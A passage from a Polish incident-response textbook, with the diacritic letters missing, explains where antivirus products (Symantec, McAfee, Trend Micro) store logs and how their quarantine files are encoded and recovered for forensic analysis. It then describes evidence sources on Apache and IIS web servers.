moe przywrci plik do pierwotnej lokalizacji bez adnych konsekwencji. Natomiast dla ledczych
kwarantanna jest bardzo wanym rdem cennego materiau dowodowego.
Specjalici RI pracujcy w rodowisku korporacyjnym powinni wsppracowa z administratorami
programw antywirusowych i poprosi ich o to, by ustawili przenoszenie podejrzanych plikw do
kwarantanny, a nie ich usuwanie. Wiele programw antywirusowych domylnie usuwa wszelkie
pliki, ktre uzna za niebezpieczne. Dziaanie takie wprawdzie ogranicza ryzyko infekcji jednego
systemu, ale jest niekorzystne dla ledczych, poniewa powoduje zatarcie ladw. Jeli program
antywirusowy usunie plik, specjalici RI nie maj szansy go zbada w celu sporzdzenia
wskanikw zagroenia.
Kady program antywirusowy ma wasn metod kodowania plikw przenoszonych do
kwarantanny. Niektre stosuj skomplikowany wasnociowy format. Jednak niezalenie od tego,
czy program zmienia tylko rozszerzenie pliku, czy szyfruje plik za pomoc klucza symetrycznego,
zazwyczaj z kwarantanny da si odzyska oryginalne pliki. Dlatego specjalista znajcy zasad
dziaania kwarantanny w okrelonej aplikacji moe wydoby pliki z zagroonego systemu.
Program Symantec Endpoint Protection

Program Symantec Endpoint Protection (SEP) to jeden z najczciej uywanych pakietw
antywirusowych. W tym punkcie przedstawiamy przegld zawartoci dziennikw tego programu
oraz formatu plikw kwarantanny wykorzystywanego do unieszkodliwiania wykrytych w systemie
zagroe. Wicej informacji na temat tego oprogramowania mona znale na stronach
internetowych firmy Symantec.
W INTERNECIE
www.symantec.com/endpoint-protection/?inid=us_ps_flyout_prdts_endptprot
Dzienniki
Standardowo program Symantec Endpoint Protection przechowuje dzienniki w folderze
%ALLUSERSPROFILE%\Application Data\Symantec\Symantec Endpoint Protection\Logs.
Zapisywanym w nim plikom nadawane s nazwy wg formatu daty RRRRMMDD oznaczajcej
czas wygenerowania danego dziennika przez aplikacj. Pliki maj format wartoci tekstowych
rozdzielanych przecinkami, dziki czemu atwo si je analizuje i przetwarza. Na stronach firmy
Symantec mona znale list wszystkich pl i ich wartoci. Aktualna wersja ESP dysponuje
pidziesicioma dziewicioma polami, wic jest ich za duo, aby je wszystkie wypisywa.
Mona je natomiast znale na stronie podanej poniej.
W INTERNECIE
www.symantec.com/business/support/index?page=content&id=TECH100099
Jednym z najbardziej godnych uwagi pl jest time of event (czas zdarzenia), ktrego warto
jest reprezentowana w niestandardowym formacie daty. Daty w dziennikach programu SEP
s zapisywane w formacie szesnastkowym zoonym z szeciu oktetw. Kady oktet mona
zdekodowa do postaci skadnika daty, tak jak pokazano w poniszej tabeli.
Oktet Opis
1 Rok, liczba lat od 1970 roku
2 Miesic (stycze = 0, grudzie = 11)
3 Dzie
4 Godzina w formacie 24-godzinnym
5 Minuta
6 Sekunda
W dokumentacji dostarczonej przez firm Symantec podano nastpujcy przykad: wpis

dziennika ze znacznikiem czasu 200A13080122, ktry odpowiada dacie 19 listopada 2002 roku,
godzina 8:01:34 UTC. Aby otrzyma t dat, naley zamieni cyfry szesnastkowe na dziesitne
i wykona nastpujce obliczenia:
20 hex = 1970+32 = 2002
0A hex = 10 (listopad)
13 hex = 19
08 hex = 08
01 hex = 01
22 hex = 34
Gdy program SEP wykryje zagroenie w systemie, to oprcz wpisu w dzienniku w katalogu
Logs generuje dodatkowo zdarzenie w dzienniku zdarze aplikacji systemu Windows. Zdarzenia
takie maj identyfikator 51, a ich rdem jest Symantec AntiVirus. Wikszo wpisw w dzienniku
zaczyna si od sw Security Risk Found (wykryto zagroenie bezpieczestwa) oraz zawiera opis
sygnatury, przy uyciu ktrej wykryto zagroenie, i pen ciek do pliku.
Uwaga Podpowiemy Ci, czego szuka we wszystkich dziennikach programw antywirusowych, nie tylko
pakietu SEP. Hakerzy czsto tworz archiwa i inne pliki, ktrych programy antywirusowe nie mog
otworzy z powodu zabezpieczenia ich hasem lub innych trudnoci. Programy antywirusowe czsto
rejestruj wic w dziennikach bdy zawierajce wanie nazw i ciek pliku. Dane takie mog
by bardzo cenne, poniewa haker moe usun uywane przez siebie pliki.
Pliki kwarantanny
Program Symantec Endpoint Protection standardowo zapisuje pliki kwarantanny w folderze
%ALLUSERSPROFILE%\Application Data\Symantec\Symantec Endpoint Protection\Quarantine
i nadaje im rozszerzenie .vbn (VBN) oraz wasny format. Dla kadego pliku wysyanego do
kwarantanny tworzone s dwa pliki VBN. Jeden zawiera metadane dotyczce tego pliku, a drugi
zakodowan kopi oryginalnego pliku.
W starszych wersjach pakietu Symantec Antivirus, poprzednika rozwizania Symantec
Endpoint Protection, kodowanie polegao na prostym zaszyfrowaniu pliku za pomoc operacji
logicznej XOR z wartoci 0x5A. Natomiast program Symantec Endpoint Protection wykorzystuje
do szyfrowania XOR warto 0xA5 i wstawia dodatkowe 5-bajtowe sekwencje w caym kodowanym
pliku. Jeli wic analityk tylko zdekoduje plik VBN za pomoc operacji XOR i klucza 0xA5,
skrt MD5 otrzymanego pliku nie bdzie zgadza si ze skrtem oryginalnego pliku przesanego
do kwarantanny i jest maa szansa, e da si ten plik uruchomi.
Firma Symantec utworzya narzdzie o nazwie qextract.exe do wydobywania plikw z kwarantanny.
Ma ono jednak pewn powan wad mona je uruchomi tylko w tym systemie, w ktrym
wykonano kwarantann pliku. W zwizku z tym narzdzie to nie nadaje si do rozszyfrowywania
plikw VBN z obrazw dyskw ani pobranych zdalnie z zainfekowanej maszyny. Program QExtract
mona pobra z podanych poniej stron firmy Symantec.
W INTERNECIE
QExtract (SEP 11) www.symantec.com/connect/sites/default/files/11xQextract.zip
QExtract (SEP 12) www.symantec.com/connect/sites/default/files/12.1Qextract.zip
Zwr uwag, e dla kadej wersji pakietu Symantec Endpoint Protection potrzebna jest inna
wersja narzdzia QExtract. Pamitaj wic, e gdy pojawi si kolejne wersje SEP, trzeba bdzie
zaopatrzy si w now wersj narzdzia.
Poniewa staramy si unika modyfikowania dowodw, dobrym sposobem na zdekodowanie
pliku VBN jest uruchomienie obrazu zagroonego systemu. Nastpnie mona bezpiecznie
uruchomi narzdzie QExtract bez obawy, e straci si jakie dowody. Inn moliwoci jest uycie
skryptu w jzyku Python o nazwie pyqextract.py autorstwa Jamaala Speightsa. W odrnieniu od
programu QExtract, skrypt ten dziaa w kadym systemie, nie tylko w tym, w ktrym program SEP
utworzy plik VBN. Jednak w naszych testach skrypt Speightsa nie zawsze odtwarza idealnie
oryginalny skrt MD5 pliku. Nie udao nam si znale przyczyny tych niepowodze, wic zalecamy
przeprowadzenie testw, zanim uyje si tego programu. Wicej informacji o skrypcie i sam skrypt
mona znale na stronie podanej poniej.
W INTERNECIE
jamaaldev.blogspot.com/2013/06/symantec-quarantined-vbn-file-decoder.html
Program McAfee VirusScan

Pakiet McAfee VirusScan Enterprise to inny popularny program antywirusowy dla przedsibiorstw.
Zapisuje dzienniki w lokalnym katalogu hosta nawet wtedy, gdy jest podczony do firmowego
serwera zarzdzania. W dziennikach tych ledczy moe znale lady wamania, nie posiadajc
dostpu do konsoli zarzdzania ani nawet administracyjnego dostpu do aplikacji lokalnej.
W INTERNECIE
www.mcafee.com/us/products/virusscan-enterprise.aspx
Najpierw przyjrzymy si dziennikom generowanym przez produkt McAfee, a nastpnie

zobaczymy, jak w jego przypadku wyglda przechowywanie plikw w kwarantannie.
Dzienniki
Wedug instrukcji uytkownika programu McAfee VirusScan dzienniki aplikacji s przechowywane
w lokalnym katalogu w rnych miejscach uzalenionych od wersji systemu Windows. W systemie
Windows 7 jest to katalog %systemdrive%\ProgramData\McAfee\DesktopProtection, natomiast
we wszystkich wczeniejszych wersjach uywany jest folder %systemdrive%\Documents and
Settings\All Users\ApplicationData\McAfee\DesktopProtection. Podrcznik uytkownika tego
programu mona znale pod poniszym adresem.
W INTERNECIE
kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/22000/PD22941/en_US/
vse_880_product_guide_en-us.pdf
W katalogu przechowywanych jest sze plikw dziennika, ktrych opis znajduje si w poniszej
tabeli. Zwr uwag, e jeli do zarzdzania programem VirusScan wykorzystywane jest narzdzie
McAfee ePolicy Orchestrator (ePO), nazwy tych plikw mog mie przedrostek ePO_.
Nazwa pliku Opis Pola

AccessProtectionLog.txt Zawiera spis aplikacji, ktre Date, Time, Event, User,
prboway zamkn program File Name
McAfee VirusScan
BufferOverflowProtectionLog.txt Zawiera informacje Date, Time, Executable
o potencjalnych prbach That Caused the Overflow,
przepenienia bufora Stack/Heap Overflow
MirrorLog.txt Zawiera informacje Date, Time, Path to Mirror
o lokalizacji zdublowanych Files, Additional Information
plikw DAT i silnikw
skanowania
OnAccessScanLog.txt Zawiera wyniki skanowania Date, Time, Detected Malware,
uywanych plikw Action Taken, Description
OnDemandScanLog.txt Zawiera wyniki Date, Time of Scan,
zaplanowanych Action Taken, Description
operacji skanowania
UpdateLog.txt Zawiera informacje Date, Time of Update,
o aktualizacjach definicji Additional Information
wirusw silnika VirusScan
Z naszego dowiadczenia wynika, e najbardziej przydatne s dzienniki OnAccessScanLog.txt

i OnDemandScanLog.txt. Zawieraj one informacje o tym, jakie pliki program VirusScan przenis
do kwarantanny lub usun z systemu oraz nazwy wykrytych zagroe. Firma McAfee prowadzi
take portal internetowy o tematyce wirusowej, w ktrym analitycy mog zdoby szczegowe
informacje o zagroeniach wykrytych przez program VirusScan i inne produkty tej firmy.
W INTERNECIE
www.mcafee.com/us/threat-center.aspx
Program McAfee zapisuje informacje o wykrytych wirusach nie tylko w dziennikach tekstowych,
ale i w dzienniku zdarze aplikacji Windows pod identyfikatorem 258 (rdem jest McLogEvent).
Teraz przyjrzymy si metodom zapisywania plikw w kwarantannie przez program McAfee
i zobaczymy, jak je mona rozkodowa.
Pliki kwarantanny
Pliki kwarantanny programu McAfee VirusScan maj rozszerzenie .bup (BUP). Przy ustawieniach
domylnych s one zapisywane w katalogu %systemdrive%\Quarantine. W plikach tych mona
znale wszelkie lady szkodliwej dziaalnoci skasowane przez program VirusScan. Ich zawarto
dzieli si na dwie czci metadane dotyczce plikw znajdujcych si w kontenerze BUP oraz
same artefakty. Kada z tych czci jest kodowana XOR przy uyciu wartoci 0x6A, a nastpnie,
w najnowszych wersjach oprogramowania, kompresowana do formatu pliku zoonego OLE.
Aby wydoby plik kwarantanny z pliku BUP, naley go otworzy za pomoc narzdzia
obsugujcego format OLECF, np. 7-Zip. Archiwum to powinno zawiera pliki o nazwach Details
i File_0. Plik Details zawiera metadane dotyczce pliku poddanego kwarantannie, a File_0 to ten
wanie plik. Za pomoc edytora szesnastkowego, np. McAfee FileInsight, mona zdekodowa
poddane kwarantannie pliki i odzyska ich oryginay do dalszej analizy.
Poniej pokazujemy przykad zdekodowanych metadanych z pliku Details.
Wida godzin wykrycia oraz oryginaln nazw pliku przeniesionego do kwarantanny
(C:\Windows\system32\pwdump.exe).
[Details]
DetectionName=PWCrack-Pwdump.a
DetectionType=16
EngineMajor=5400
EngineMinor=1158
DATMajor=7075
DATMinor=0
DATType=2
ProductID=12106
CreationYear=2013
CreationMonth=5
CreationDay=15
CreationHour=3
CreationMinute=8
CreationSecond=48
TimeZoneName=Eastern Daylight Time
TimeZoneOffset=240
NumberOfFiles=1
NumberOfValues=0
[File_0]
ObjectType=5
OriginalName=C:\WINDOWS\SYSTEM32\PWDUMP.EXE
WasAdded=0
Program Trend Micro OfficeScan

Program Trend Micro OfficeScan to kolejny pakiet antywirusowy, jaki czsto spotykamy podczas
prowadzenia ledztw w rnych przedsibiorstwach. Podobnie jak w przypadku produktw firm
Symantec i McAfee, administrator moe zarzdza tym oprogramowaniem zdalnie, ale wszelkie
lady szkodliwej dziaalnoci zapisuje ono w katalogu lokalnym. Wicej informacji o programie
Trend Micro OfficeScan mona znale pod podanymi poniej adresami.
W INTERNECIE
www.trendmicro.com/us/enterprise/product-security/officescan/index.html
trendedge.trendmicro.com/pr/tm/te/document/OfficeScan_10_Report_Mappings_091130.pdf
Dzienniki
Program Trend Micro OfficeScan zapisuje informacje o wykrytych zagroeniach w pliku o nazwie
pccnt35.log znajdujcym si w podfolderze Misc swojego katalogu instalacyjnego. Jest to plik
w formacie tekstowym zawierajcy siedem wartoci rozdzielanych symbolem <;>.
Tabela na nastpnej stronie zawiera wykaz pl tego pliku zgodnie z opisem zamieszczonym
w podrczniku Trend Micro OfficeScan 10 Report Objects Reference Guide.
Oto przykadowy wpis z dziennika programu Trend Micro OfficeScan:
20130501<;>1059 <;>HKTL_PWDUMPBD<;>0<;>1<;>0<;>C:\WINDOWS\system32\pwdump.exe<;>
Z wpisu tego dowiadujemy si, e wykryty zosta plik o nazwie C:\WINDOWS\system32\pwdump.exe

i sygnaturze HKTL_PWDUMPBD oraz e usunito go dnia 01 maja 2013 roku o godzinie 10:59
(czas lokalny komputera) podczas skanowania plikw na bieco.
Pliki kwarantanny
W domylnej instalacji program Trend Micro OfficeScan zapisuje i szyfruje pliki poddane kwarantannie
w podfolderze o nazwie SUSPECT znajdujcym si w katalogu instalacyjnym. Firma Trend Micro utworzya
narzdzie o nazwie VSEncode.exe suce do deszyfrowania tych plikw i przywracania ich zawartoci.
Aby rozszyfrowa pliki w kwarantannie za pomoc narzdzia VSEncode.exe, naley sporzdzi
ich list w pliku tekstowym. Trzeba poda ciek do tych plikw, po jednej w linijce, oraz
zapisa plik listy z rozszerzeniem .ini lub .txt, a nastpnie wykona ponisze polecenie.
Czon <plik_konfiguracyjny> naley zastpi ciek do pliku z list:
VSEncode.exe /d /i <plik_konfiguracyjny>
Spowoduje to rozszyfrowanie plikw znajdujcych si na licie i bdzie mona przeprowadzi

analiz wykrytych wirusw. Wicej informacji na temat przywracania plikw z kwarantanny
mona znale na stronach firmy Trend Micro.
W INTERNECIE
docs.trendmicro.com/all/ent/officescan/v10.6/en-us/osce_10.6_olhsrv/ohelp/scan/scanactvmec.htm
Pole Opis
Date Data w formacie RRRRMMDD
Time Czas lokalny klienta wystpienia zdarzenia w formacie GGMM
Infection Name Nazwa sygnatury odpowiadajcej infekcji
Scan Results Wyniki zdarzenia. Kody tego pola s nastpujce:
0: wyczyszczono,
1: przeniesiono,
2: usunito,
3: zmieniono nazw,
4: dla skanowania na bieco jest to przepuszczenie > odmowa dostpu,
5: nie udao si wyczyci,
6: nie udao si przenie,
7: nie udao si usun,
8: nie udao si zmieni nazwy,
10: nie udao si wyczyci (przeniesiono),
11: nie udao si wyczyci (usunito),
12: nie udao si wyczyci (zmieniono nazw),
13: dla skanowania na bieco jest to przepuszczenie > odmowa dostpu,
dla pozostaych rodzajw skanowania jest to przepuszczono,
14: nie udao si wyczyci (nie udao si przenie),
15: nie udao si wyczyci (nie udao si usun),
16: nie udao si wyczyci (nie udao si zmieni nazwy),
25: przekazano potencjalne zagroenie bezpieczestwa.
Scan Type Typ skanowania. Kody tego pola s nastpujce:
0: skanowanie rczne,
1: skanowanie na bieco,
2: skanowanie zaplanowane,
3: skanowanie na danie,
4: skanowanie DCS (ang. Damage Cleanup Service).
Not Used Pole nieuywane
Path cieka do zainfekowanego pliku
SERWERY SIECIOWE
Gdy dojdzie do publikacji niechcianych treci na firmowej stronie internetowej, jaki aktywista
wstrzyknie kod SQL do bazy danych magazynu internetowego albo sie botw spowoduje awari
portalu przetwarzania kart kredytowych, w proces ten na pewno zaangaowany jest serwer sieciowy.
Serwery te obsuguj wikszo komunikacji internetowej i dlatego bardzo czsto mamy z nimi do
czynienia podczas ledztw. Aby efektywnie wykorzysta dowody pochodzce z serwera sieciowego,
naley dobrze zna protokoy sieciowe, odpowiednie pliki konfiguracyjne oraz powizane z nimi
dzienniki. W podrozdziale tym opisujemy dwa najczciej uywane serwery sieciowe, czyli serwer
HTTP Apache i Microsoft Internet Information Services (IIS). Zanim jednak przejdziemy do opisu
konkretnych programw, najpierw przedstawimy gar oglnych informacji o serwerach sieciowych.
Podstawowe informacje o serwerach sieciowych

Serwery sieciowe obsuguj dania klientw, ktrymi mog by np. przegldarki internetowe,
za pomoc protokou HTTP (ang. Hypertext Transfer Protocol). Dwa najczciej uywane
polecenia tego protokou, zwane te metodami, to GET i POST. dania typu GET s powszechnie
wykorzystywane do pobierania treci z serwera, natomiast dania typu POST su najczciej do
wysyania danych na serwer. Teoretycznie serwer sieciowy moe nasuchiwa na kadym porcie TCP,
ale przyjo si, e klienty HTTP cz si z serwerami przez port TCP 80, jeli nie jest stosowane
szyfrowanie, i przez port TCP 443, jeli uywany jest protok SSL (ang. Secure Socket Layer).
Pierwsze serwery tylko kojarzyy dania klientw z plikami znajdujcymi si w katalogach
i zwracay odpowiedzi. Nowoczesne serwery sieciowe i protok HTTP maj o wiele wicej
zastosowa. Jednym z najwaniejszych poj, jakie naley zna, jest host wirtualny. Funkcja ta
umoliwia obsug treci wielu niepowizanych ze sob stron internetowych przez jeden serwer
wszystko przy uyciu tego samego portu TCP i adresu IP. Hosty wirtualne umoliwiaj
hostowanie setek, a nawet tysicy witryn internetowych na jednym systemie z uruchomion tylko
jedn instancj serwera Apache. Prowadzc ledztwo w sprawie wamania na serwer sieciowy,
naley o tym pamita wszystkie wykonywane czynnoci mog mie wpyw na kad witryn
internetow, niekoniecznie w jakikolwiek sposb zwizan z incydentem.
Protok HTTP zapewnia jeszcze szersze moliwoci. Jeli chcesz dowiedzie si wicej na jego
temat, zajrzyj do dokumentu RFC 2616 znajdujcego si pod podanym niej adresem.
W INTERNECIE
www.ietf.org/rfc/rfc2616.txt
Tematem tego punktu jest jednak to, czego mona si dowiedzie z serwerw sieciowych
w ramach prowadzonego ledztwa. Mona wyrni dwa gwne rda materiau dowodowego,
czyli dzienniki i zawarto serwera. Najpierw przyjrzymy si dziennikom.
Dzienniki serwerw Apache i IIS s w formacie tekstowym, cho rni si od siebie.
Wikszo serwerw domylnie zapisuje podstawowe informacje o kadym daniu: adres IP
klienta, zadany adres URL, metod HTTP oraz odpowied serwera (powodzenie, bd itd.).
Dzienniki serwerw mona konfigurowa i kady serwer dysponuje wasnymi rozwizaniami.

W wikszoci przypadkw domylne ustawienia dziennika wystarczaj, aby dzienniki byy
przydatne w ledztwie. Najczciej w plikach tych szukamy nastpujcych informacji:
da, ktre nadeszy w okrelonym okresie;
da do i od okrelonych adresw IP;
da okrelonych adresw URL;
da zawierajcych okrelony identyfikator aplikacji uytkownika.
Czasami przeprowadzamy analiz statystyczn lub inn w celu wykrycia nienormalnej aktywnoci.
Niektre z tych technik opisalimy w nastpnym rozdziale.
W rodowiskach firmowych zdarza si tak, e mechanizmy rwnowace obcienie maskuj
pewne szczegy. Poniewa mechanizmy te s dla klienta jak warstwa porednia, serwer bezporednio
komunikuje si tylko z tym mechanizmem. Z tego powodu serwer zapisuje adresy IP jednostek
rwnowacych obcienie, a nie prawdziwe adresy klientw wysyajcych dania, co moe
uniemoliwi podenie tropem szkodliwej aktywnoci. Czasami problem ten mona rozwiza
przez zbadanie dziennikw mechanizmw rwnowacych obcienie.
Jednak skorelowanie aktywnoci zarejestrowanej w dziennikach serwera sieciowego
z aktywnoci zarejestrowan w dziennikach mechanizmu rwnowacego obcienie moe by
trudne. Dobrym rozwizaniem jest skonfigurowanie moduu rwnowaenia obcienia w taki
sposb, aby przepuszcza pewne informacje dotyczce klienta w daniu, najlepiej w nagwku
HTTP o nazwie X-Forwarded-For (XFF). Nastpnie wystarczy tak skonfigurowa serwer sieciowy,
aby z kadym daniem zapisywa w dzienniku nagwek XFF. Jeli w Twoim rodowisku z serwerami
sieciowymi wsppracuj moduy rwnowaenia obcienia, zalecamy pobranie prbek dziennikw
i rozwizanie problemu zawczasu. Jednym z najczciej uywanych moduw rwnowaenia
obcienia jest BIG-IP firmy F5. W artykule, do ktrego odnonik podano poniej, przedstawiono
kilka porad na temat sposobw rozwizania opisywanego przez nas problemu.
W INTERNECIE
support.f5.com/kb/en-us/solutions/public/4000/800/sol4816.html
Drugim wanym rdem dowodw jest tre sieciowa znajdujce si na serwerze pliki
wchodzce w skad witryny internetowej. Hakerzy atakujcy serwery sieciowe czsto wykorzystuj
luki w istniejcych stronach lub modyfikuj te strony, a nawet wysyaj na serwer wasne pliki, np.
konsole sieciowe lub inne narzdzia. Pliki te naley przeanalizowa, aby dowiedzie si, co haker
usiowa zdziaa. Wikszo treci jest w formacie tekstowym, wic mona j obejrze w dowolnym
edytorze tekstu. Jednak czasami uywane s te skompilowane pliki wykonywalne lub skrypty ze
specjalnie zaciemnionym kodem rdowym. W takich przypadkach pomocne mog by techniki
opisane w rozdziale 15.
Umiejscowienie dziennikw i treci sieciowej moe by rne. S wprawdzie pewne standardowe
ustawienia, ale zawsze naley sprawdzi lokaln konfiguracj, aby mie pewno, e niczego si nie
przeoczyo. Szczegowo lokalizacj dowodw w serwerach Apache i IIS opisujemy dalej w tym rozdziale.
Serwer HTTP Apache

Serwer sieciowy Apache to program o otwartym kodzie rdowym. Powsta w 1995 roku i bardzo
szybko zdoby popularno: dzi wikszo stron internetowych dziaa wanie na tym serwerze.
Wikszo organizacji instaluje Apache w systemach uniksowych, takich jak Linux i BSD, ale
mona go zainstalowa take w systemie Microsoft Windows. Poniewa serwer Apache jest
darmowy, solidny i ma bogat funkcjonalno, spotykamy go zarwno w bardzo maych firmach,
jak i duych korporacjach. Wicej informacji o nim mona znale na podanej poniej stronie.
W INTERNECIE
httpd.apache.org
Teraz przejdziemy do pierwszego interesujcego nas obszaru konfiguracji.
Konfiguracja
Gwnym skadnikiem serwera jest prosty serwer HTTP. Jednak moduy mog rozszerza jego
funkcjonalno o takie funkcje jak obsuga serwerowych jzykw programowania, szyfrowanie
i niestandardowe metody uwierzytelniania. Ponadto jest wiele dyrektyw konfiguracyjnych
modyfikujcych sposb zapisywania dziennikw i zachowanie samego serwera. Jako e dyrektywy
konfiguracyjne czasami si zmieniaj, najlepiej je sprawdzi w dokumentacji zamieszczonej na
stronie internetowej projektu Apache. Poniej opisujemy tylko kilka najwaniejszych elementw.
Nazwy i lokalizacje plikw konfiguracyjnych typowe nazwy plikw konfiguracyjnych
serwera Apache to httpd.conf, apache.conf i apache2.conf. W rodowiskach uniksowych pliki
te najczciej mona znale w katalogach /etc, /etc/apache i /etc/apache2. Kada z tych
cieek ma dodatkowo przedrostek /usr/local. Jeli nie znajdziesz jednego z tych plikw
na serwerze, moesz sprbowa go znale w plikach w systemie typowych dyrektyw
konfiguracyjnych: ServerRoot, DocumentRoot oraz LogFormat. Ponadto serwer Apache
umoliwia zapisywanie specjalnych dyrektyw konfiguracyjnych w pliku o nazwie .htaccess.
Dyrektywy te maj zastosowanie do katalogu, w ktrym znajduje si ten plik, i wszystkich
jego podkatalogw. Cho nie poleca si uywania tych plikw, pliki .htaccess s powszechnie
wykorzystywane.
Nazwy i lokalizacje dziennikw domylne nazwy plikw dziennikw to access.log
i error.log. Wikszo rodowisk uniksowych zawiera zewntrzne narzdzia do obsugi
tych dziennikw, wic ich nazwy mog mie zmienione rozszerzenie na .<liczba> lub
.<liczba>.gz, np. access.log.1 albo access.log.32.gz. Typowe miejsca przechowywania
dziennikw w rodowisku uniksowym to /var/log/httpd, /var/log/apache i /var/log/apache2.
Jako e sposb zapisywania dziennikw mona zmieni, powinno si poszuka dyrektyw
CustomLog i ErrorLog w plikach konfiguracyjnych serwera Apache, aby sprawdzi ich
lokalizacj. Ponadto w dyrektywach LogFormat warto sprawdzi, jakie pola s zapisywane
w kadym formacie dziennika.
Lokalizacje treci w rodowiskach uniksowych domylnym miejscem przechowywania

treci sieciowej jest katalog /var/www, cho uytkownicy czsto go zmieniaj. Dlatego
naley przynajmniej przeszuka wszystkie pliki konfiguracyjne pod ktem wystpowania
dyrektyw ServerRoot i DocumentRoot, ktre okrelaj lokalizacj treci. Trudno jednak
znale wszystkie miejsca, w ktrych moe znajdowa si jaka tre, poniewa serwer
Apache ma wiele funkcji. Najlepiej wsppracowa z administratorem serwera, ktry
pomoe znale wszystko, co jest potrzebne.
Serwer Apache zapisuje dane w skonfigurowanych dziennikach w okrelonym formacie, a rozmiar
plikw osignie systemowy limit. Innymi sowy, w serwerze Apache nie ma domylnie ustawionego
limitu rozmiaru dziennika ani nie jest wczona funkcja rotacji dziennikw, cho wielu uytkownikw
dodaje j za pomoc zewntrznych narzdzi. Jeeli podczas uruchamiania usugi Apache istnieje
jaki dziennik, serwer dodaje nowe dane na jego kocu starsza tre pozostaje nienaruszona.
Na koniec wrcimy jeszcze do problemu zwizanego z nagwkiem X-Forwarded-For,
o ktrym pisalimy wczeniej. W serwerze Apache mona bez problemu zapisa w dzienniku
kady nagwek HTTP. Jeli chodzi o X-Forwarded-For, wystarczy doda do definicji LogFormat
polecenie %{X-Forwarded-For}i i ponownie uruchomi usug Apache.
Dzienniki
Serwer Apache zapisuje pliki dziennikw w postaci tekstowej. Format ten mona dostosowywa
i jest okrelony w pliku konfiguracyjnym Apache. Najczciej spotykamy formaty CLF
(ang. Common Log Format) i NCSA extended/combined. Poniej znajduje si przykad typowego
wpisu z dziennika Apache w formacie NCSA:
172.24.13.37 - - [17/Feb/2014:16:31:43 -0500] "GET /download/2014021.txt HTTP/1.1"
200 1330 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
Z wpisu tego dowiadujemy si, e klient o adresie IP 172.24.13.37 wysa danie GET adresu
URL /download/2014021.txt i w odpowiedzi otrzyma 1330 bajtw danych. Serwer Apache
odpowiedzia kodem 200 oznaczajcym powodzenie obsugi dania. Pola bez towarzyszcych
danych s oznaczane znakiem minus. Wicej przykadw i dokadniejszy opis poszczeglnych
skadnikw wpisw mona znale na stronie serwera Apache.
W INTERNECIE
httpd.apache.org/docs/2.4/logs.html
Serwer Microsoft Information Services

Serwer IIS Microsoftu, wczeniej zwany Internet Information Server, powsta jako dodatek do
systemu Windows NT 3.51. Pniej w systemie Windows NT 3.51 z dodatkiem Service Pack 3 (SP3)
firma Microsoft zmienia go w opcjonalny skadnik systemu Windows. Od tamtej pory serwer IIS
jest obecny w prawie kadej wersji systemu Windows, cho nie jest domylnie instalowany
w wersjach nieserwerowych. Pocztkowo IIS by popularniejszy od serwera Apache. Jednak

w poowie 1996 roku Apache przecign IIS pod wzgldem liczby hostowanych stron na caym
wiecie. Mimo to serwer IIS spotykamy bardzo czsto, cho mona si spiera, czy jest to wskanik
jego popularnoci, czy czego innego. Wicej informacji o tym produkcie i darmow wersj
do pobrania (o nazwie IIS Express) mona znale na poniszej stronie internetowej.
W INTERNECIE
www.iis.net
www.iis.net/learn/extensions/introduction-to-iis-express/iis-express-overview
Konfiguracja
Serwer IIS konfiguruje si przez Panel sterowania systemu Windows, w sekcji Narzdzia
administracyjne/Meneder internetowych usug informacyjnych. Nie kady jednak ma dostp
do panelu sterowania IIS, aby sprawdzi jego ustawienia. Jeli masz dostp do systemu plikw,
wikszo ustawie potrzebnych specjalicie od incydentw bezpieczestwa znajdziesz w pliku
konfiguracyjnym w formacie XML o nazwie applicationHost.config znajdujcym si w katalogu
%systemdrive%\system32\inetsrv\config. W pliku tym poznasz nazw strony internetowej, jej
identyfikator, katalog gwny oraz ciek do dziennika kadej witryny znajdujcej si na serwerze.
Poniej znajduje si przykadowy fragment treci pliku applicationHost.config:
<site name="Default Web Site" id="1">
<application path="/">
<virtualDirectory path="/" physicalPath="%SystemDrive%\inetpub\wwwroot" />
</application>
<bindings>
<binding protocol="http" bindingInformation="*:80:" />
</bindings>
</site>
<siteDefaults>
<logFile logFormat="W3C" directory="%SystemDrive%\inetpub\logs\LogFiles" />
<traceFailedRequestsLogging directory=
"%SystemDrive%\inetpub\logs\FailedReqLogFiles" />
</siteDefaults>
Najwaniejsze elementy to site, virtualDirectory, logFile oraz binding. Element site

zawiera identyfikator (tu: 1) wykorzystywany na kocu nazwy katalogu dziennika znajdujcego si
w katalogu wyznaczonym przez dyrektyw logFile. W zwizku z tym, w tej konfiguracji nazwa
katalogu dziennika bdzie nastpujca: %SystemDrive%\inetpub\logs\LogFiles\W3SVC1. Element
virtualDirectory okrela lokalizacj katalogu gwnego witryny (%SystemDrive%\inetpub\wwwroot).
Wartoci z tego przykadu przedstawiaj domylne ustawienia serwera IIS.
Domylnie plikom dziennikw IIS nazwy nadawane s wg wzoru ex<rrmmdd>.log, gdzie
<rrmmdd> reprezentuje dat skadajc si z trzech par cyfr okrelajcych rok, miesic i dzie.
I tak dziennik z dnia 20 lutego 2014 roku miaby nazw ex140220.log. W IIS 7 zaczto domylnie
kodowa pliki dziennika w formacie UTF-8. Na znak tego na pocztku nazwy kadego pliku dodawany
jest przedrostek u_ (np. u_ex140220.log). Domylnie serwer IIS tworzy nowy dziennik codziennie,
ale mona to zmieni na cykl tygodniowy, miesiczny, wg rozmiaru pliku oraz cakiem wyczy.
I w kocu na serwerze IIS rozwizanie kwestii nagwka X-Forwarded-For jest troch trudniejsze.
Znalelimy wpis na pewnym blogu zawierajcy opis kilku moliwoci, m.in. polegajcej na wczeniu
opcji zaawansowanego rejestrowania w usugach IIS i zainstalowania wasnych moduw.
W INTERNECIE
blogs.iis.net/deanc/archive/2013/07/08/iis7-8-logging-the-real-client-ip-in-the-iis-hit-logs.aspx
www.iis.net/learn/extensions/advanced-logging-module/advanced-logging-for-iis-custom-logging
Gdy zostanie wczona opcja zaawansowanego rejestrowania w usugach IIS, serwer zacznie
domylnie zapisywa dzienniki w innym katalogu %SystemDrive%\inetpub\logs\AdvancedLogs.
Wicej informacji na temat tej opcji mona znale na stronach podanych powyej.
Dzienniki
Serwer IIS zapisuje dzienniki w formacie W3C Extended Log File. Jest to prosty format tekstowy,
cho w IIS 7 zaczto kodowa dzienniki za pomoc technologii UTF-8, wic mog zawiera znaki
Unicode. Pola mona dostosowywa, a ich domylny zestaw w rnych wersjach serwera moe by
